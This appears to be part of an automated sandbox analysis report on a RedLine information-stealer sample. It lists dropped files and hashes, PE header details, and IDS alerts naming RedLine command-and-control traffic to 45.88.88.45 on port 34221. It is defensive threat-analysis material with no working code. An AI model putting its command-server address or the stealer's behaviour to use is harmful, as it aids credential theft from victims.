                                                                      SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                      MD5:28222628A3465C5F0D4B28F70F97F482
                                                                      SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                      SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                      SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                      Malicious:false
                                                                      Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                      C:\Users\user\AppData\Local\Temp\tmpDC54.tmp

                                                                      Download File
                                                                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                      Category:dropped
                                                                      Size (bytes):40960
                                                                      Entropy (8bit):0.8553638852307782
                                                                      Encrypted:false
                                                                      SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                      MD5:28222628A3465C5F0D4B28F70F97F482
                                                                      SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                      SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                      SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                      Malicious:false
                                                                      Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                      C:\Users\user\AppData\Local\Temp\tmpDC75.tmp

                                                                      Download File
                                                                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                      Category:dropped
                                                                      Size (bytes):40960
                                                                      Entropy (8bit):0.8553638852307782
                                                                      Encrypted:false
                                                                      SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                      MD5:28222628A3465C5F0D4B28F70F97F482
                                                                      SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                      SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                      SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                      Malicious:false
                                                                      Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                      C:\Users\user\AppData\Local\Temp\tmpDC76.tmp

                                                                      Download File
                                                                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                      Category:dropped
                                                                      Size (bytes):40960
                                                                      Entropy (8bit):0.8553638852307782
                                                                      Encrypted:false
                                                                      SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                      MD5:28222628A3465C5F0D4B28F70F97F482
                                                                      SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                      SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                      SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                      Malicious:false
                                                                      Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                      C:\Users\user\AppData\Local\Temp\tmpDC96.tmp

                                                                      Download File
                                                                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                      Category:dropped
                                                                      Size (bytes):106496
                                                                      Entropy (8bit):1.1373607036346451
                                                                      Encrypted:false
                                                                      SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c9G/k4:MnlyfnGtxnfVuSVumEHUM4
                                                                      MD5:64BCCF32ED2142E76D142DF7AAC75730
                                                                      SHA1:30AB1540F7909BEE86C0542B2EBD24FB73E5D629
                                                                      SHA-256:B274913369030CD83E1C76E8D486F501E349D067824C6A519F2DAB378AD0CC09
                                                                      SHA-512:0C2B4FC0D38F97C8411E1541AB15B78C57FEA370F02C17F8CB26101A936F19E636B02AF1DF2A62C8EAEE6B785FE17879E2723D8618C9C3C8BD11EB943BA7AB31
                                                                      Malicious:false
                                                                      Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                      C:\Users\user\AppData\Local\Temp\tmpEB90.tmp

                                                                      Download File
                                                                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 7, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 7
                                                                      Category:dropped
                                                                      Size (bytes):196608
                                                                      Entropy (8bit):1.1209886597424439
                                                                      Encrypted:false
                                                                      SSDEEP:192:r2qAdB9TbTbuDDsnxCkvSAE+WslKOMq+8QbnVcxjONC4Je5Q:r2qOB1nxCkvSAELyKOMq+8QTQKC+
                                                                      MD5:EFD26666EAE0E87B32082FF52F9F4C5E
                                                                      SHA1:603BFE6A7D6C0EC4B8BA1D38AEA6EFADDC42B5E0
                                                                      SHA-256:67D4CAA4255418EB18873F01597D1F4257C4146D1DCED78E26D5FD76B783F416
                                                                      SHA-512:28ADD7B8D88795F191567FD029E9F8BC9AEF7584CE3CD56DB40BBA52BC8335F2D8E53A5CE44C153C13A31FD0BE1D76D1E558A4AA5987D5456C000C4D64F08EAA
                                                                      Malicious:false
                                                                      Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                      C:\Users\user\AppData\Local\Temp\tmpEBA0.tmp

                                                                      Download File
                                                                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 7, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 7
                                                                      Category:dropped
                                                                      Size (bytes):196608
                                                                      Entropy (8bit):1.1209886597424439
                                                                      Encrypted:false
                                                                      SSDEEP:192:r2qAdB9TbTbuDDsnxCkvSAE+WslKOMq+8QbnVcxjONC4Je5Q:r2qOB1nxCkvSAELyKOMq+8QTQKC+
                                                                      MD5:EFD26666EAE0E87B32082FF52F9F4C5E
                                                                      SHA1:603BFE6A7D6C0EC4B8BA1D38AEA6EFADDC42B5E0
                                                                      SHA-256:67D4CAA4255418EB18873F01597D1F4257C4146D1DCED78E26D5FD76B783F416
                                                                      SHA-512:28ADD7B8D88795F191567FD029E9F8BC9AEF7584CE3CD56DB40BBA52BC8335F2D8E53A5CE44C153C13A31FD0BE1D76D1E558A4AA5987D5456C000C4D64F08EAA
                                                                      Malicious:false
                                                                      Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                      C:\Users\user\AppData\Local\Temp\tmpEBB1.tmp

                                                                      Download File
                                                                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 7, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 7
                                                                      Category:dropped
                                                                      Size (bytes):196608
                                                                      Entropy (8bit):1.1209886597424439
                                                                      Encrypted:false
                                                                      SSDEEP:192:r2qAdB9TbTbuDDsnxCkvSAE+WslKOMq+8QbnVcxjONC4Je5Q:r2qOB1nxCkvSAELyKOMq+8QTQKC+
                                                                      MD5:EFD26666EAE0E87B32082FF52F9F4C5E
                                                                      SHA1:603BFE6A7D6C0EC4B8BA1D38AEA6EFADDC42B5E0
                                                                      SHA-256:67D4CAA4255418EB18873F01597D1F4257C4146D1DCED78E26D5FD76B783F416
                                                                      SHA-512:28ADD7B8D88795F191567FD029E9F8BC9AEF7584CE3CD56DB40BBA52BC8335F2D8E53A5CE44C153C13A31FD0BE1D76D1E558A4AA5987D5456C000C4D64F08EAA
                                                                      Malicious:false
                                                                      Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                      C:\Users\user\AppData\Local\Temp\tmpEBD1.tmp

                                                                      Download File
                                                                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 7, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 7
                                                                      Category:dropped
                                                                      Size (bytes):196608
                                                                      Entropy (8bit):1.1209886597424439
                                                                      Encrypted:false
                                                                      SSDEEP:192:r2qAdB9TbTbuDDsnxCkvSAE+WslKOMq+8QbnVcxjONC4Je5Q:r2qOB1nxCkvSAELyKOMq+8QTQKC+
                                                                      MD5:EFD26666EAE0E87B32082FF52F9F4C5E
                                                                      SHA1:603BFE6A7D6C0EC4B8BA1D38AEA6EFADDC42B5E0
                                                                      SHA-256:67D4CAA4255418EB18873F01597D1F4257C4146D1DCED78E26D5FD76B783F416
                                                                      SHA-512:28ADD7B8D88795F191567FD029E9F8BC9AEF7584CE3CD56DB40BBA52BC8335F2D8E53A5CE44C153C13A31FD0BE1D76D1E558A4AA5987D5456C000C4D64F08EAA
                                                                      Malicious:false
                                                                      Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                      C:\Users\user\AppData\Local\Temp\tmpEBE2.tmp

                                                                      Download File
                                                                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                      File Type:SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
                                                                      Category:dropped
                                                                      Size (bytes):98304
                                                                      Entropy (8bit):0.08235737944063153
                                                                      Encrypted:false
                                                                      SSDEEP:12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
                                                                      MD5:369B6DD66F1CAD49D0952C40FEB9AD41
                                                                      SHA1:D05B2DE29433FB113EC4C558FF33087ED7481DD4
                                                                      SHA-256:14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
                                                                      SHA-512:771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
                                                                      Malicious:false
                                                                      Preview:SQLite format 3......@ ..........................................................................j......}..}...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                      C:\Users\user\AppData\Local\Temp\tmpEEB6.tmp

                                                                      Download File
                                                                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                      Category:dropped
                                                                      Size (bytes):106496
                                                                      Entropy (8bit):1.1373607036346451
                                                                      Encrypted:false
                                                                      SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c9G/k4:MnlyfnGtxnfVuSVumEHUM4
                                                                      MD5:64BCCF32ED2142E76D142DF7AAC75730
                                                                      SHA1:30AB1540F7909BEE86C0542B2EBD24FB73E5D629
                                                                      SHA-256:B274913369030CD83E1C76E8D486F501E349D067824C6A519F2DAB378AD0CC09
                                                                      SHA-512:0C2B4FC0D38F97C8411E1541AB15B78C57FEA370F02C17F8CB26101A936F19E636B02AF1DF2A62C8EAEE6B785FE17879E2723D8618C9C3C8BD11EB943BA7AB31
                                                                      Malicious:false
                                                                      Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                      C:\Users\user\AppData\Local\Temp\tmpEEC6.tmp

                                                                      Download File
                                                                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                      Category:dropped
                                                                      Size (bytes):106496
                                                                      Entropy (8bit):1.1373607036346451
                                                                      Encrypted:false
                                                                      SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c9G/k4:MnlyfnGtxnfVuSVumEHUM4
                                                                      MD5:64BCCF32ED2142E76D142DF7AAC75730
                                                                      SHA1:30AB1540F7909BEE86C0542B2EBD24FB73E5D629
                                                                      SHA-256:B274913369030CD83E1C76E8D486F501E349D067824C6A519F2DAB378AD0CC09
                                                                      SHA-512:0C2B4FC0D38F97C8411E1541AB15B78C57FEA370F02C17F8CB26101A936F19E636B02AF1DF2A62C8EAEE6B785FE17879E2723D8618C9C3C8BD11EB943BA7AB31
                                                                      Malicious:false
                                                                      Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                      C:\Users\user\AppData\Local\Temp\tmpEEE7.tmp

                                                                      Download File
                                                                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                      Category:dropped
                                                                      Size (bytes):106496
                                                                      Entropy (8bit):1.1373607036346451
                                                                      Encrypted:false
                                                                      SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c9G/k4:MnlyfnGtxnfVuSVumEHUM4
                                                                      MD5:64BCCF32ED2142E76D142DF7AAC75730
                                                                      SHA1:30AB1540F7909BEE86C0542B2EBD24FB73E5D629
                                                                      SHA-256:B274913369030CD83E1C76E8D486F501E349D067824C6A519F2DAB378AD0CC09
                                                                      SHA-512:0C2B4FC0D38F97C8411E1541AB15B78C57FEA370F02C17F8CB26101A936F19E636B02AF1DF2A62C8EAEE6B785FE17879E2723D8618C9C3C8BD11EB943BA7AB31
                                                                      Malicious:false
                                                                      Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                      C:\Users\user\AppData\Local\Temp\tmpEEF7.tmp

                                                                      Download File
                                                                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                      Category:dropped
                                                                      Size (bytes):106496
                                                                      Entropy (8bit):1.1373607036346451
                                                                      Encrypted:false
                                                                      SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c9G/k4:MnlyfnGtxnfVuSVumEHUM4
                                                                      MD5:64BCCF32ED2142E76D142DF7AAC75730
                                                                      SHA1:30AB1540F7909BEE86C0542B2EBD24FB73E5D629
                                                                      SHA-256:B274913369030CD83E1C76E8D486F501E349D067824C6A519F2DAB378AD0CC09
                                                                      SHA-512:0C2B4FC0D38F97C8411E1541AB15B78C57FEA370F02C17F8CB26101A936F19E636B02AF1DF2A62C8EAEE6B785FE17879E2723D8618C9C3C8BD11EB943BA7AB31
                                                                      Malicious:false
                                                                      Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                      C:\Users\user\AppData\Roaming\VWGccZGgix.exe

                                                                      Download File
                                                                      Process:C:\Users\user\Desktop\13P2mxLaQk.exe
                                                                      File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                      Category:dropped
                                                                      Size (bytes):592896
                                                                      Entropy (8bit):7.594989783475602
                                                                      Encrypted:false
                                                                      SSDEEP:12288:6LLWTG4mVR6vCQy5LSjWur/4cRt4WXjzFcMwipq:gCTg6vCQyh+Wur/lRDDE
                                                                      MD5:B47604CCFF9C611EAF0AA3D7443827B7
                                                                      SHA1:C09A5BE24CD42BBD7605D0B40351D5134CF782A5
                                                                      SHA-256:77F30441445CEB75C76EFF7BFB97F24849BC6155EFB298F69A795933BF2F5E9A
                                                                      SHA-512:2CF63CB9161F519FDBBF3E896206FE9D4ABB216A15B65D0E81875684658E0A6DD498CF936522A8F99B44AD4EA3498E42E82B93E25B32A64FE770ED9F96281AEF
                                                                      Malicious:true
                                                                      Antivirus:
                                                                      • Antivirus: ReversingLabs, Detection: 58%
                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....f..............0.............R.... ... ....@.. .......................`............@.....................................O.... .......................@....................................................... ............... ..H............text...X.... ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                      C:\Users\user\AppData\Roaming\VWGccZGgix.exe:Zone.Identifier

                                                                      Download File
                                                                      Process:C:\Users\user\Desktop\13P2mxLaQk.exe
                                                                      File Type:ASCII text, with CRLF line terminators
                                                                      Category:dropped
                                                                      Size (bytes):26
                                                                      Entropy (8bit):3.95006375643621
                                                                      Encrypted:false
                                                                      SSDEEP:3:ggPYV:rPYV
                                                                      MD5:187F488E27DB4AF347237FE461A079AD
                                                                      SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                      SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                      SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                      Malicious:true
                                                                      Preview:[ZoneTransfer]....ZoneId=0

                                                                      Static File Info

                                                                      General

                                                                      File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                      Entropy (8bit):7.594989783475602
                                                                      TrID:
                                                                      • Win32 Executable (generic) Net Framework (10011505/4) 49.79%
                                                                      • Win32 Executable (generic) a (10002005/4) 49.75%
                                                                      • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                      • Windows Screen Saver (13104/52) 0.07%
                                                                      • Win16/32 Executable Delphi generic (2074/23) 0.01%
                                                                      File name:13P2mxLaQk.exe
                                                                      File size:592'896 bytes
                                                                      MD5:b47604ccff9c611eaf0aa3d7443827b7
                                                                      SHA1:c09a5be24cd42bbd7605d0b40351d5134cf782a5
                                                                      SHA256:77f30441445ceb75c76eff7bfb97f24849bc6155efb298f69a795933bf2f5e9a
                                                                      SHA512:2cf63cb9161f519fdbbf3e896206fe9d4abb216a15b65d0e81875684658e0a6dd498cf936522a8f99b44ad4ea3498e42e82b93e25b32a64fe770ed9f96281aef
                                                                      SSDEEP:12288:6LLWTG4mVR6vCQy5LSjWur/4cRt4WXjzFcMwipq:gCTg6vCQyh+Wur/lRDDE
                                                                      TLSH:A1C4E0382549C80BC6951A340DB1F1B846EC6EEDB802EB4B9FDC6EEF757370309651A6
                                                                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......f..............0.............R.... ... ....@.. .......................`............@................................

                                                                      File Icon

                                                                      Icon Hash:62ceac86b2968ea2

                                                                      Static PE Info

                                                                      General

                                                                      Entrypoint:0x490c52
                                                                      Entrypoint Section:.text
                                                                      Digitally signed:false
                                                                      Imagebase:0x400000
                                                                      Subsystem:windows gui
                                                                      Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                      DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                      Time Stamp:0x66FCBAE9 [Wed Oct 2 03:15:53 2024 UTC]
                                                                      TLS Callbacks:
                                                                      CLR (.Net) Version:
                                                                      OS Version Major:4
                                                                      OS Version Minor:0
                                                                      File Version Major:4
                                                                      File Version Minor:0
                                                                      Subsystem Version Major:4
                                                                      Subsystem Version Minor:0
                                                                      Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                                      Entrypoint Preview

                                                                      Instruction
                                                                      jmp dword ptr [00402000h]
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al

                                                                      Data Directories

                                                                      NameVirtual AddressVirtual Size Is in Section
                                                                      IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_IMPORT0x90c000x4f.text
                                                                      IMAGE_DIRECTORY_ENTRY_RESOURCE0x920000x1208.rsrc
                                                                      IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_BASERELOC0x940000xc.reloc
                                                                      IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                                      IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                      Sections

                                                                      NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                      .text0x20000x8ec580x8f000350e78c8f507a2aa3a04c7a73e6ac88fFalse0.8563514122596154data7.614575434550098IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                      .rsrc0x920000x12080x14008bde6757dfdb02882b9efd1df4b8e9a5False0.288671875data4.77077397966687IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                      .reloc0x940000xc0x4008fcfdb32a18fbc8f67595007052f7d6cFalse0.025390625data0.04468700625387198IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                      Resources

                                                                      NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                      RT_ICON0x921180xda8Device independent bitmap graphic, 26 x 64 x 32, image size 33280.2823226544622426
                                                                      RT_GROUP_ICON0x92ec00x14data1.1
                                                                      RT_GROUP_ICON0x92ed40x14data1.05
                                                                      RT_VERSION0x92ee80x320data0.44875

                                                                      Imports

                                                                      DLLImport
                                                                      mscoree.dll_CorExeMain

                                                                      Network Behavior

                                                                      Suricata IDS Alerts

                                                                      TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                      2024-10-07T11:29:19.382523+02002849662ETPRO MALWARE RedLine - CheckConnect Request1192.168.2.84970745.88.88.4534221TCP
                                                                      2024-10-07T11:29:22.371423+02002849662ETPRO MALWARE RedLine - CheckConnect Request1192.168.2.84971045.88.88.4534221TCP
                                                                      2024-10-07T11:29:24.542021+02002045000ET MALWARE RedLine Stealer - CheckConnect Response145.88.88.4534221192.168.2.849707TCP
                                                                      2024-10-07T11:29:24.941101+02002849351ETPRO MALWARE RedLine - EnvironmentSettings Request1192.168.2.84970745.88.88.4534221TCP
                                                                      2024-10-07T11:29:27.354396+02002045000ET MALWARE RedLine Stealer - CheckConnect Response145.88.88.4534221192.168.2.849710TCP
                                                                      2024-10-07T11:29:27.589571+02002849351ETPRO MALWARE RedLine - EnvironmentSettings Request1192.168.2.84971045.88.88.4534221TCP
                                                                      2024-10-07T11:29:27.905794+02002045001ET MALWARE Win32/LeftHook Stealer Browser Extension Config Inbound145.88.88.4534221192.168.2.849707TCP
                                                                      2024-10-07T11:29:27.905794+02002046056ET MALWARE Redline Stealer/MetaStealer Family Activity (Response)145.88.88.4534221192.168.2.849707TCP
                                                                      2024-10-07T11:29:28.316654+02002849352ETPRO MALWARE RedLine - SetEnvironment Request1192.168.2.84971345.88.88.4534221TCP
                                                                      2024-10-07T11:29:29.923744+02002848200ETPRO MALWARE RedLine - GetUpdates Request1192.168.2.84971445.88.88.4534221TCP
